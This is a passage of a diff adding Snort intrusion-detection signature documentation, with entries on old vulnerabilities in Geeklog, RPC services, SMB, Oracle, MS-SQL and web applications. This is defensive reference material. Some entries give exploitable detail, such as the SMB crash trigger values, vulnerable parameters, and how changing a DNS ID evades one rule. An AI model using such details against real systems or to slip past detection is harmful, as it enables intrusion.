+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000731.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000731
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "DeleteComment.Action.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "DeleteComment.Action.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1587.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1587
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1747.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1747
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cachefsd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cachefsd is using.  Attackers can also learn what versions of the cachefsd protocol are accepted by cachefsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cachefsd run.  The cachefsd RPC service is used by Solaris hosts to cache requests for remote file systems mounted by the Network File System (NFS).  There is a vulnerability associated with cachefsd that may cause a buffer overflow, allowing an attacker to execute abitrary code with the privileges of cachefsd, possibly root. 
+
+--
+Affected Systems:
+Solaris 2.5.1, 2.6, 7, 8, 9
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cachefsd runs.  This may be a precursor to an attack to exploit the cachefsd buffer overflow.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user is allowed to perform NFS mounts, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cachefsd, not probes of the cachefsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cachefsd service itself. An attacker may attempt to go directly to the cachefsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2002-0084
+
+Bugtraq:
+http://www.securityfocus.com/bid/4674
+
+
+--
--- /dev/null
+++ b/doc/signatures/1181.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1181
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1159.txt
@@ -0,0 +1,62 @@
+Rule:  
+--
+
+Sid:
+1159
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the webplus
+CGI script.
+
+--
+Impact:
+Information Gathering.
+
+--
+Detailed Information:
+Some versions of TalentSoft Web+ contain vulnerabilities that can
+allow arbitrary files to be read or executed by an attacker. Disclosure
+of script source code is also possible.
+
+--
+Affected Systems:
+	TalentSoft Web+
+
+--
+Attack Scenarios:
+An attacker needs to supply a malicious request to the server containing
+webplus?script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply any appropriate vendor supplied patches.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1907.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2101.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+
+--
+Sid: 2101
+
+--
+Summary:
+
+A buffer overflow exists in the SMB (Server Message Block) Protocol 
+implementation in Microsfot Windows NT, Windows 2000, and Windows XP 
+that allows attackers to cause a denial of service via a NetShareEnum 
+request.
+
+--
+Impact:
+
+An attacker can cause the target system to lock up and require manual
+reboot.  With more research, an attacker may be able to exploit this
+buffer overflow and execute arbitrary code, but this research has not
+been made public at this time.
+
+--
+Detailed Information:
+
+SMB on a vulnerable system may crash if it recieves a specially crafted
+packet containing a NetServerEnum, NetServerEnum2, or NetServerEnum3 
+transaction request.  If either the paramaters "Max Parameter Count" or
+"Max Data Count" are set to 0, then a vulnerable system will crash.  
+NetServerEnum requests require an authorized user account, however 
+NetServerEnum2 and NetServerEnum3 require anonymous access.  Anonymous
+access is enabled by default.  This signature looks for both the "Max Parameter Count" and "Max Data Count" set to 0.
+
+--
+Attack Scenarios:
+
+Simple. An attacker would use one of the various publicly available 
+tools to launch this attack.
+
+--
+Ease of Attack:
+
+Numerous tools, including a windows binary (SMBDie.exe), have been made
+publicly available to exploit the denial of service portion of this 
+vulnerability.
+
+--
+False Positives:
+
+This rule may generate an event on functions other than NetServerEnum, 
+NetServerEnum2, or NetServerEnum3.  An SMB decoder is not available in 
+Snort, thus verification that the function being called is not feasable.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Install the patches available from Microsoft.  The patches are listed in
+Microsoft's advisory for this vulnerability.
+
+www.microsoft.com/technet/security/bulletin/MS02-045.asp
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@snort.org>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+cve,CAN-2002-0724
+
+Microsoft:
+url,www.microsoft.com/technet/security/bulletin/MS02-045.asp; 
+url,www.corest.com/common/showdoc.php?idx=262; 
+
+--
--- /dev/null
+++ b/doc/signatures/2968.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2968
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2492.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2492
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/303.txt
@@ -0,0 +1,79 @@
+Rule:
+--
+Sid:
+303
+
+--
+Summary:
+A specific inverse query has been performed against your DNS server as a
+precursor to a possible transaction signature (TSIG) buffer overflow 
+attack. 
+
+--
+Impact:
+attempt to gain access to information required for the TSIG exploit.  A 
+TSIG buffer overflow exploit attempt will usually follow if there is a 
+response to the inverse query.
+
+
+--
+Detailed Information:
+This is an attempt to perform a specific DNS inverse query against your 
+DNS server.  While this specific action is not harmful itself, it 
+signals a precusor to a possible buffer overflow attack for a TSIG 
+vulernability.  The inverse query is performed for reconnaissance for 
+the TSIG attack. 
+
+--
+Affected Systems:
+BIND Versions 4 and through 8.2 are susceptible to the inverse query 
+information leak.
+
+
+--
+Attack Scenarios:
+The envisioned scenario is that if a DNS server responds to the inverse 
+query and leaks information required in the actual attack, the exploit 
+code then attacks the TSIG buffer overflow vulnerability.  If this is 
+successful, the attacker gains access to the DNS server at the privilege
+of the DNS daemon, named (potentially root). 
+
+
+--
+Ease of Attack:
+Code is available to exploit the vulnerability.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+A user could change the exploit code.  For instance, a user could change
+the DNS identification number in the code to be something other than 
+0xABCD and the rule would not fire.
+
+--
+Corrective Action:
+Update to BIND versions greater than 8.2 to prevent the information 
+leak.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2302
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0010
+
+Arachnids:
+http://www.whitehats.com/info/IDS482
+
+--
--- /dev/null
+++ b/doc/signatures/2860.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2860
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_date
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2050.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+2050
+
+--
+Summary:
+of MS-SQL server running on a host.
+
+--
+Impact:
+Denial of Service, possible code execution and control of the server.
+
+--
+Detailed Information:
+Versions of Microsofts implementation of SQL server running the 
+resolution service are subject to multiple buffer overflows.
+
+It is possible to overwrite memory with data of the attackers choosing, 
+resulting in a denial of service or possible code execution. This is 
+done by sending carefully crafted packets to the resolution service 
+running on the server.
+
+It is also possible for the attacker to cause a denial of service by 
+sending a spoofed packet purporting to be from one SQL server to 
+another. The resulting exchange between the two servers could result in 
+a denial of service.
+
+--
+Affected Systems:
+	Cisco BBSM 5.0
+	Cisco BBSM 5.1
+	Cisco CallManager 3.3.x
+	Cisco Unity 3.x
+	Cisco Unity 4.x
+	
+	Microsoft .NET Framework 1.0
+	Microsoft SQL Server 2000
+	Windows 2000 Any version
+	Windows NT Any version
+
+--
+Attack Scenarios:
+The SQL Slammer (Sapphire) worm exploited the vulnerabilities in this 
+service.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This rule can be triggered by UDP responses to requests originating from
+ephemeral port 1434. Example: a DNS response with transaction ID between
+0x0400 and 0x04FF.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Update all instances of the vulnerable systems with patches from the 
+vendor.
+
+Use a firewall to deny access to ports used by the SQL server, usually 
+1433 and 1434, from the Internet.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-039.asp
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0649
+
+Bugtraq:
+http://www.securityfocus.com/bid/5310
+http://www.securityfocus.com/bid/5311
+
+--
--- /dev/null
+++ b/doc/signatures/100000559.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000559
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Infinite Core Technologies ICT" application running on a 
+webserver. Access to the file "index.php" with SQL commands being passed as the 
+"post" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "post" parameter in the "index.php" script used by the 
+"Infinite Core Technologies ICT" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Infinite Core Technologies ICT
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1708.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1708
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000825.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000825
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Phorum" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "mode" parameter in the "posting.php" script used by the "Phorum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Phorum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2649.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2649
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+
+An attacker can attempt to connect to a database using an overly
+long service_name value. This can cause a buffer overflow, allowing
+an attacker to execute arbitrary code.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+       Oracle7, Oracle8, Oracle8i, and Oracle9i
+
+--
+Attack Scenarios:
+An attacker can attempt to connect to a database supplying the
+service_name an overly long value.  The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck52.html
+
+--
--- /dev/null
+++ b/doc/signatures/923.txt
@@ -0,0 +1,62 @@
+SID:
+923
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000446.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000446
+
+--
+Summary:
+Particle Wiki is susceptible to an injection attack due to a lack of input
+validation on the version variable used in the index.php component.
+
+--
+Impact:
+The injection attack could result in data leakage, or potential remote 
+compromise.
+
+--
+Detailed Information:
+Particle Wiki is prone to an SQL-injection vulnerability. This issue is due to
+a failure in the application to properly sanitize user-supplied input before
+using it in an SQL query. 
+
+A successful exploit could allow an attacker to compromise the application,
+access or modify data, or exploit vulnerabilities in the underlying database
+implementation.
+
+--
+Attack Scenarios:
+Variable manipulation can be done with any browser.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Edit code and add input validation.
+
+--
+Contributors:
+Dan Ramaswami <danr@sourcefire.com>
+
+-- 
+Additional References:
+
+-- 
--- /dev/null
+++ b/doc/signatures/2719.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2719
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure abort_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1197.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1197
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
